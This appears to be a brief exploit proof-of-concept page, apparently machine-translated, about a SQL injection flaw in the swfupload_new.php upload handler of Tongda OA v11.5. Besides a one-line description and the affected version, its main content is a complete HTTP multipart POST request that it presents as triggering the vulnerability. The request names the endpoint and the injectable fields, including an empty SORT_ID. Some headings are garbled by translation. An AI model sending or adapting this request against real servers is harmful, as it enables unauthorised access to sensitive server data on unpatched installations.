Tongda Oa V11 5 Swfupload_new Php Sql Injection Vulnerability

Tongda OA v11.5 swfupload_new.php SQL injection vulnerability

Vulnerability Description

The Tongda OA v11.5 swfupload_new.php file has SQL injection vulnerability, and the attacker can obtain server sensitive information through the vulnerability.

Vulnerability Impact

Tongda OA v11.5

Network surveying and mapping

Vulnerability reappears

Login page

Send request packet triggers vulnerability

POST /general/file_folder/swfupload_new.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 355
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
Accept-Encoding: gzip

------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"

2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"

------------GFioQpMK0vv2--

If you gain something, just like it